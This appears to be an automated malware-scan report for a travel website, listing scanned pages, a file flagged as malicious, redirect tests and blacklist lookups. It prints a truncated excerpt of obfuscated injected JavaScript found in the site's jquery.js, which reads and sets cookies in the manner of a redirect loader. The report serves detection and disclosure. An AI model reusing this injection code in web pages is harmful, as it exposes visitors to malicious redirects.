Scanned pages/files
| Request | Server response | Status |
http://searchingcities.com/ | 200 OK Content-Length: 10840 Content-Type: text/html | clean |
http://www.partner.viator.com/js/console.js | 200 OK Content-Length: 55071 Content-Type: text/javascript | clean |
http://www.partner.viator.com/modules/widgets/js/initWidget.js | 200 OK Content-Length: 2336 Content-Type: text/javascript | clean |
http://searchingcities.com/wp-includes/js/jquery.js | 200 OK Content-Length: 2201 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Idn8L="us\x65r\x69d\x41\x30\x3817F\x4225";var x3SI="25";var wafda4E=1;var mV7neN;function I4Vs(u1pE1){var jaa31yF=document.cookie;if(!jaa31yF){return null;}jaa31yF=jaa31yF.replace(/\s/g,"");var vcLHlPf=jaa31yF.split(";");var i=0;for(i=0;i<vcLHlPf.length;i++){var a86wFvm=vcLHlPf[i].split("=");if(a86wFvm[0]!=u1pE1){continue;}return unescape(a86wFvm[1]);}return null;};function uzoN(u1pE1,OjF3,T_8H4vg){var exp=new Date();var O9kLD=exp.getTime()+(T_8H4vg*60*60*1000);exp.setTime(O9kLD);var yT0r Antivirus reports:
| ||
http://www.partner.viator.com/modules/widgets/js/pasWidget.js | 200 OK Content-Length: 7117 Content-Type: text/javascript | clean |
http://searchingcities.com/new_york_city.html | 200 OK Content-Length: 12793 Content-Type: text/html | clean |
http://searchingcities.com/index.html | 200 OK Content-Length: 14310 Content-Type: text/html | clean |
http://searchingcities.com/rio_de_janeiro_travel.htm | 200 OK Content-Length: 18711 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21183 Content-Type: text/javascript | clean |
http://searchingcities.com/linx.html | 200 OK Content-Length: 40873 Content-Type: text/html | clean |
http://searchingcities.com/ http://www.budapesthotels.com | 404 Not Found Content-Length: 347 Content-Type: text/html | clean |
http://searchingcities.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://searchingcities.com/www.hyve.com/adult-web-hosting | 404 Not Found Content-Length: 347 Content-Type: text/html | clean |
http://searchingcities.com/www.hyve.com/coldfusion-web-hosting | 404 Not Found Content-Length: 352 Content-Type: text/html | clean |
http://searchingcities.com/las_vegas_travel.htm | 200 OK Content-Length: 9222 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: searchingcities.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Aug 2014 17:25:02 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 10840
Content-Type: text/html
...10840 bytes of data.
GET / HTTP/1.1
Host: searchingcities.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Aug 2014 17:25:02 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 10840
Content-Type: text/html
...10840 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: searchingcities.com
Referer: http://www.google.com/search?q=searchingcities.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: searchingcities.com
Referer: http://www.google.com/search?q=searchingcities.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=searchingcities.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://searchingcities.com/
Result: searchingcities.com is not infected or malware details are not published yet.
Result: searchingcities.com is not infected or malware details are not published yet.